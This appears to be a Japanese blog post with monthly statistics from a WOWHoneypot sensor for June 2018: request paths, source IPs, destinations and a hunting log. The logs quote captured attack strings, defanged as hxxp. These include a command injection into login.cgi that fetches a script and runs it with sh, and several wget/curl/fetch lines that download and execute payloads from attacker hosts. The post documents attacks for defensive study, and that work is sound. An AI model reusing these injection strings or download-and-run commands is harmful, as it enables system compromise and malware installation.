2018年6月度のWOWHoneypotのアクセスまとめ
遅くなりましたが、2018年6月(5-30)までの1ヶ月間のアクセスログの統計を取りました。
まずは、6月の総アクセス件数は7598件です。
では、いつものmethod+pathによる統計(top20)です。
| method | path | count |
| GET | / | 1643 |
| GET | /manager/html | 1336 |
| HEAD | / | 651 |
| POST | /command.php | 612 |
| GET | /index.action | 103 |
| GET | /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ | 84 |
| GET | /index.php | 65 |
| GET | /pmamy2/index.php | 61 |
| GET | /phpMyAdmin/index.php | 58 |
| GET | /mysql-admin/index.php | 58 |
| GET | /db/index.php | 58 |
| GET | /admin/mysql/index.php | 58 |
| GET | /pmd/index.php | 57 |
| GET | /pma/index.php | 57 |
| GET | /phpmyadmin1/index.php | 57 |
| GET | /phpmyadmin/index.php | 57 |
| GET | /phpmyadmin-old/index.php | 56 |
| GET | /admin/index.php | 56 |
| GET | /PMA2/index.php | 56 |
| GET | /myadmin/index.php | 55 |
なお、PMA関連と思われるパスにpを含みindex.phpを含むアクセスであれば、1664件ですやはり、phpMyAdmin関連のスキャンは大量でした。
ただ、それの次の規模がtomcatの管理画面へのブルートフォース攻撃の1336件です。
ほぼ一日のブルートフォースでそれなりの件数を出しており、ハニポのサンプル数が少ない分、スパイクは大きくなってしまいます。
次に、送信元IPの統計です。あまり、何かが見えるとは思っていないですが…。
| srcIP | count |
| 187.75.224.xx | 1209 |
| 203.90.230.xx | 545 |
| 191.190.27.xx | 156 |
| 189.100.133.xx | 156 |
| 179.154.248.xx | 156 |
| 177.35.49.xx | 156 |
| 200.79.176.xx | 95 |
| 218.93.207.xx | 94 |
| 118.184.27.xx | 94 |
| 120.198.17.xx | 93 |
| 140.143.65.xx | 92 |
| 116.196.106.xx | 92 |
| 115.29.47.xx | 92 |
| 61.181.xx | 86 |
| 115.159.151.xx | 86 |
| 120.79.144xx | 85 |
| 103.82.52.xx | 85 |
| 47.90.102.xx | 84 |
また、宛先の統計です。IP以外のものは、たいてい不正中継の調査です。
| dstIP | count |
| (IP):80 | 6013 |
| blank:80 | 1391 |
| 127.0.0.1:80 | 97 |
| localhost:80 | 30 |
| (IP):443 | 16 |
| (host):80 | 12 |
| どこかのドメイン:80 | 17 |
| どこかのIP:83 | 12 |
| どこかのIP:80 | 6 |
ハンティングログの統計は以下です。
| 84 | wget hxxp://185.62.190.191/r15 wget -c hxxp://wap.tfddos.net:57843/linux 6 wget -c hxxp://119.188.247.73:5858/tatada |
| 5 | wget -c hxxp://119.188.247.73:5858/88888syzz |
| 4 | wget -O nmlt1.sh hxxp://domstates.su/nmlt1.sh |
| 4 | wget -c hxxp://119.188.247.73:5858/TTTUS2 |
| 3 | wget -P /tmp hxxp://hfs.mhacker.cc:9278/Linux.server 3 wget -c hxxp://aaa.linuxa.club:57843/linux |
| 2 | wget -c hxxp://60.250.99.131:9998/liux |
| 1 | wget --user-agent ""linux"" -O - hxxp://107.181.174.232/lin/st.sh |
| 1 | wget -qO - hxxp://128.199.251.119/gpon.php |
| 1 | wget hxxp://95.110.227.132/ch/wp-admin/js/a/msr;perl msr;rm -rf msr ; curl -O hxxp://95.110.227.132/ch/wp-admin/js/a/msr;perl msr;rm -rf msr; fetch hxxp://95.110.227.132/ch/wp-admin/js/a/msr |
| 1 | wget hxxp://217.61.6.127/t |
| 1 | wget -c hxxp://23.249.162.123:9998/servic |
| 1 | fetch hxxp://95.110.227.132/ch/wp-admin/js/a/msr |
| 1 | curl -O hxxp://95.110.227.132/ch/wp-admin/js/a/msr;perl msr;rm -rf msr; fetch hxxp://95.110.227.132/ch/wp-admin/js/a/msr |
